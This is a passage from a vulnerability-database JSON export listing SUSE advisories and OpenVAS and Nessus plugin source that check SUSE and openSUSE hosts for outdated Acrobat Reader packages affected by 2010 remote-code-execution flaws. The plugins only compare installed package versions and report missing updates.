\"CVE-2010-2212\");\n script_name(\"SuSE Update for acroread SUSE-SA:2010:029\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of acroread\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.3.3~2.1\", rls:\"openSUSE11.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.3.3~2.1.1\", rls:\"openSUSE11.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.3.3~2.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-15T11:58:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1295", "CVE-2010-2211", "CVE-2010-2201", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-2207", "CVE-2010-2203", "CVE-2010-2210", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-2204", "CVE-2010-1285", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-1240", "CVE-2010-2208", "CVE-2010-2168"], "description": "Check for the Version of acroread", "modified": "2017-12-15T00:00:00", "published": "2010-07-12T00:00:00", "id": "OPENVAS:850135", "href": "http://plugins.openvas.org/nasl.php?oid=850135", "type": "openvas", "title": "SuSE Update for acroread SUSE-SA:2010:029", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SuSE Update for acroread SUSE-SA:2010:029\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Acrobat Reader was updated to version 9.3.3 to fix lots of security\n issues and bugs, several of whom could be used to execute code by\n trick the target user to open specially crafted PDFs.\n\n Adobes advisory can be found here:\n http://www.adobe.com/support/security/bulletins/apsb10-15.html\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_impact = \"remote code execution\";\ntag_affected = \"acroread on openSUSE 11.0, openSUSE 11.1, openSUSE 11.2\";\n\n\nif(description)\n{\n script_id(850135);\n script_version(\"$Revision: 8130 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-15 07:31:09 +0100 (Fri, 15 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-07-12 11:56:20 +0200 (Mon, 12 Jul 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2010-029\");\n script_cve_id(\"CVE-2010-1240\", \"CVE-2010-1285\", \"CVE-2010-1295\", \"CVE-2010-1297\", \"CVE-2010-2168\", \"CVE-2010-2201\", \"CVE-2010-2202\", \"CVE-2010-2203\", \"CVE-2010-2204\", \"CVE-2010-2205\", \"CVE-2010-2206\", \"CVE-2010-2207\", \"CVE-2010-2208\", \"CVE-2010-2209\", \"CVE-2010-2210\", \"CVE-2010-2211\", \"CVE-2010-2212\");\n script_name(\"SuSE Update for acroread SUSE-SA:2010:029\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of acroread\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.3.3~2.1\", rls:\"openSUSE11.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.3.3~2.1.1\", rls:\"openSUSE11.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.3.3~2.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T11:22:50", "bulletinFamily": "unix", "cvelist": ["CVE-2010-2215", "CVE-2010-2188", "CVE-2010-2862", "CVE-2010-2216", "CVE-2010-0209", "CVE-2010-2213", "CVE-2010-1240", "CVE-2010-2214"], "description": "Specially crafted PDF documents could crash acroread or lead to execution of arbitrary code (CVE-2010-1240, CVE-2010-2862). This update also incorporate the Adobe Flash Player update APSB10-16 for the bundled flash player parts (CVE-2010-0209, CVE-2010-2188, CVE-2010-2213, CVE-2010-2214, CVE-2010-2215, CVE-2010-2216). Please see Adobe's site for more information: http://www.adobe.com/support/security/bulletins/apsb10-17.html 2) Solution or Work-Around\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2010-09-01T13:59:57", "published": "2010-09-01T13:59:57", "id": "SUSE-SA:2010:037", "href": "http://lists.opensuse.org/opensuse-security-announce/2010-09/msg00000.html", "title": "remote code execution in acroread", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:08:46", "bulletinFamily": "unix", "cvelist": ["CVE-2010-1295", "CVE-2010-2211", "CVE-2010-2201", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-2207", "CVE-2010-2203", "CVE-2010-2210", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-2204", "CVE-2010-1285", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-1240", "CVE-2010-2208", "CVE-2010-2168"], "description": "Acrobat Reader was updated to version 9.3.3 to fix lots of security issues and bugs, several of whom could be used to execute code by trick the target user to open specially crafted PDFs.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2010-07-08T11:59:38", "published": "2010-07-08T11:59:38", "id": "SUSE-SA:2010:029", "href": "http://lists.opensuse.org/opensuse-security-announce/2010-07/msg00004.html", "type": "suse", "title": "remote code execution in acroread", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-17T14:04:07", "description": "Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code (CVE-2010-1240, CVE-2010-2862).\n\nThis update also incorporate the Adobe Flash Player update APSB10-16\nfor the bundled flash player parts (CVE-2010-0209, CVE-2010-2188,\nCVE-2010-2213, CVE-2010-2214, CVE-2010-2215, CVE-2010-2216).", "edition": 24, "published": "2010-09-02T00:00:00", "title": "openSUSE Security Update : acroread (openSUSE-SU-2010:0573-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2215", "CVE-2010-2188", "CVE-2010-2862", "CVE-2010-2216", "CVE-2010-0209", "CVE-2010-2213", "CVE-2010-1240", "CVE-2010-2214"], "modified": "2010-09-02T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:acroread-fonts-ja", "p-cpe:/a:novell:opensuse:acroread-cmaps", "cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:acroread", "p-cpe:/a:novell:opensuse:acroread-fonts-ko", "p-cpe:/a:novell:opensuse:acroread-fonts-zh_CN", "p-cpe:/a:novell:opensuse:acroread-fonts-zh_TW"], "id": "SUSE_11_1_ACROREAD-100826.NASL", "href": "https://www.tenable.com/plugins/nessus/49083", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-3036.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(49083);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-0209\", \"CVE-2010-1240\", \"CVE-2010-2188\", \"CVE-2010-2213\", \"CVE-2010-2214\", \"CVE-2010-2215\", \"CVE-2010-2216\", \"CVE-2010-2862\");\n\n script_name(english:\"openSUSE Security Update : acroread (openSUSE-SU-2010:0573-1)\");\n script_summary(english:\"Check for the acroread-3036 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code (CVE-2010-1240, CVE-2010-2862).\n\nThis update also incorporate the Adobe Flash Player update APSB10-16\nfor the bundled flash player parts (CVE-2010-0209, CVE-2010-2188,\nCVE-2010-2213, CVE-2010-2214, CVE-2010-2215, CVE-2010-2216).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=629134\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-09/msg00000.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe PDF Escape EXE Social Engineering (No JavaScript)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-cmaps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/08/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/09/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-9.3.4-0.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-cmaps-9.3.4-0.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-fonts-ja-9.3.4-0.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-fonts-ko-9.3.4-0.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-fonts-zh_CN-9.3.4-0.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-fonts-zh_TW-9.3.4-0.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread / acroread-cmaps / acroread-fonts-ja / acroread-fonts-ko / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:09:43", "description": "Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code (CVE-2010-1240 / CVE-2010-2862). This has\nbeen fixed.\n\nThis update also incorporates the Adobe Flash Player update APSB10-16\nfor the bundled flash player parts. (CVE-2010-0209 / CVE-2010-2188 /\nCVE-2010-2213 / CVE-2010-2214 / CVE-2010-2215 / CVE-2010-2216)", "edition": 24, "published": "2010-12-02T00:00:00", "title": "SuSE 11 / 11.1 Security Update : Acrobat Reader (SAT Patch Numbers 3008 / 3009)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2215", "CVE-2010-2188", "CVE-2010-2862", "CVE-2010-2216", "CVE-2010-0209", "CVE-2010-2213", "CVE-2010-1240", "CVE-2010-2214"], "modified": "2010-12-02T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:acroread-fonts-ja", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_CN", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-ko", "p-cpe:/a:novell:suse_linux:11:acroread-cmaps", "p-cpe:/a:novell:suse_linux:11:acroread", "p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_TW"], "id": "SUSE_11_ACROREAD-100825.NASL", "href": "https://www.tenable.com/plugins/nessus/50883", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50883);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-0209\", \"CVE-2010-1240\", \"CVE-2010-2188\", \"CVE-2010-2213\", \"CVE-2010-2214\", \"CVE-2010-2215\", \"CVE-2010-2216\", \"CVE-2010-2862\");\n\n script_name(english:\"SuSE 11 / 11.1 Security Update : Acrobat Reader (SAT Patch Numbers 3008 / 3009)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code (CVE-2010-1240 / CVE-2010-2862). This has\nbeen fixed.\n\nThis update also incorporates the Adobe Flash Player update APSB10-16\nfor the bundled flash player parts. (CVE-2010-0209 / CVE-2010-2188 /\nCVE-2010-2213 / CVE-2010-2214 / CVE-2010-2215 / CVE-2010-2216)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=629134\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-0209.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-1240.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2188.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2213.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2214.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2215.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2216.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-2862.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply SAT patch number 3008 / 3009 as appropriate.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe PDF Escape EXE Social Engineering (No JavaScript)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-cmaps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread-fonts-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/08/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-9.3.4-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-cmaps-9.3.4-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-fonts-ja-9.3.4-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-fonts-ko-9.3.4-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-fonts-zh_CN-9.3.4-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-fonts-zh_TW-9.3.4-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"acroread-cmaps-9.3.4-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"acroread-fonts-ja-9.3.4-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"acroread-fonts-ko-9.3.4-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"acroread-fonts-zh_CN-9.3.4-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"acroread-fonts-zh_TW-9.3.4-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"acroread-9.3.4-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"acroread-cmaps-9.3.4-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"acroread-fonts-ja-9.3.4-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"acroread-fonts-ko-9.3.4-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"acroread-fonts-zh_CN-9.3.4-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"acroread-fonts-zh_TW-9.3.4-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"acroread-cmaps-9.3.4-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"acroread-fonts-ja-9.3.4-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"acroread-fonts-ko-9.3.4-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"acroread-fonts-zh_CN-9.3.4-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"acroread-fonts-zh_TW-9.3.4-0.6.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:07:03", "description": "Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code (CVE-2010-1240, CVE-2010-2862).\n\nThis update also incorporate the Adobe Flash Player update APSB10-16\nfor the bundled flash player parts (CVE-2010-0209, CVE-2010-2188,\nCVE-2010-2213, CVE-2010-2214, CVE-2010-2215, CVE-2010-2216).", "edition": 24, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : acroread (openSUSE-SU-2010:0573-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2215", "CVE-2010-2188", "CVE-2010-2862", "CVE-2010-2216", "CVE-2010-0209", "CVE-2010-2213", "CVE-2010-1240", "CVE-2010-2214"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:acroread", "cpe:/o:novell:opensuse:11.3"], "id": "SUSE_11_3_ACROREAD-100826.NASL", "href": "https://www.tenable.com/plugins/nessus/75418", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-3036.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75418);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-0209\", \"CVE-2010-1240\", \"CVE-2010-2188\", \"CVE-2010-2213\", \"CVE-2010-2214\", \"CVE-2010-2215\", \"CVE-2010-2216\", \"CVE-2010-2862\");\n\n script_name(english:\"openSUSE Security Update : acroread (openSUSE-SU-2010:0573-1)\");\n script_summary(english:\"Check for the acroread-3036 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted PDF documents could crash acroread or lead to\nexecution of arbitrary code (CVE-2010-1240, CVE-2010-2862).\n\nThis update also incorporate the Adobe Flash Player update APSB10-16\nfor the bundled flash player parts (CVE-2010-0209, CVE-2010-2188,\nCVE-2010-2213, CVE-2010-2214, CVE-2010-2215, CVE-2010-2216).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=629134\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-09/msg00000.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe PDF Escape EXE Social Engineering (No JavaScript)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/08/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n 